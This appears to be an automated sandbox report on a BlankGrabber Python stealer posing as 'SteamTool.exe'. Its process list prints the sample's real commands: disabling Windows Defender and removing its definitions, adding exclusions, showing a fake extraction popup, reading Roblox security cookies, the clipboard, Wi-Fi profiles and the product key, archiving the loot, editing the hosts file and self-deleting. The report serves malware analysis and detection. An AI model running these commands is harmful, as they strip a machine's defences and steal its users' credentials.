Analysis Overview
SHA256
1b113b3fc34dddb83d165a91e37bcf00afe61dbdf4be216e6ef518aeae7e47cf
Threat Level: Known bad
The file SteamTool.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
UPX packed file
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Files and Directories
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Modifies registry class
Views/modifies file attributes
Enumerates processes with tasklist
Gathers system information
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Detects videocard installed
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 21:40
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 21:40
Reported
2024-06-19 21:45
Platform
win11-20240508-en
Max time kernel
283s
Max time network
285s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SteamTool.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SteamTool.exe
"C:\Users\Admin\AppData\Local\Temp\SteamTool.exe"
C:\Users\Admin\AppData\Local\Temp\SteamTool.exe
"C:\Users\Admin\AppData\Local\Temp\SteamTool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SteamTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SteamTool.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SteamTool.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SteamTool.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command elided]"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command elided]
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kwoszjqd\kwoszjqd.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7956.tmp" "c:\Users\Admin\AppData\Local\Temp\kwoszjqd\CSCD74F2CA13F724827AB474720BEDBC65D.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe a -r -hp"akbar" "C:\Users\Admin\AppData\Local\Temp\8vhJp.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe a -r -hp"akbar" "C:\Users\Admin\AppData\Local\Temp\8vhJp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SteamTool.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.0.748445370\169528534" -parentBuildID 20230214051806 -prefsHandle 1736 -prefMapHandle 1728 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e3befc2-2d8f-4102-a5bc-b267144c65a0} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 1816 20433b0d458 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.1.389190633\337776833" -parentBuildID 20230214051806 -prefsHandle 2320 -prefMapHandle 2316 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5bb1ba6-808b-4d7b-8277-c4770804a302} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 2340 20426e88a58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.2.819946973\1928095735" -childID 1 -isForBrowser -prefsHandle 2888 -prefMapHandle 2584 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6271fbe-96d8-41e0-b320-9e5c28bf84f8} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 2576 204363e0658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.3.486355482\1999395079" -childID 2 -isForBrowser -prefsHandle 3568 -prefMapHandle 3552 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f417d15d-9f42-4b0c-b0a4-be702c19b38f} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 3580 20439612258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.4.703764317\586603824" -childID 3 -isForBrowser -prefsHandle 5172 -prefMapHandle 5160 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a37683f-7ec0-4946-b173-b8c2419ad4c3} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5184 2043a842258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.5.1354394484\436679997" -childID 4 -isForBrowser -prefsHandle 5388 -prefMapHandle 5384 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59f66a56-0660-46f7-8aa1-23d7d3c0ea97} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5396 2043be0fd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.6.220556986\862648564" -childID 5 -isForBrowser -prefsHandle 5204 -prefMapHandle 5200 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7dc6ff1-9ced-4578-82c5-aca8b4bd412c} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5068 2043be0eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.7.1303166205\787404001" -parentBuildID 20230214051806 -prefsHandle 5352 -prefMapHandle 2712 -prefsLen 27695 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aee7b66a-df1b-4e0b-a277-c0a87f9c6ea6} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 3536 2043be2ba58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
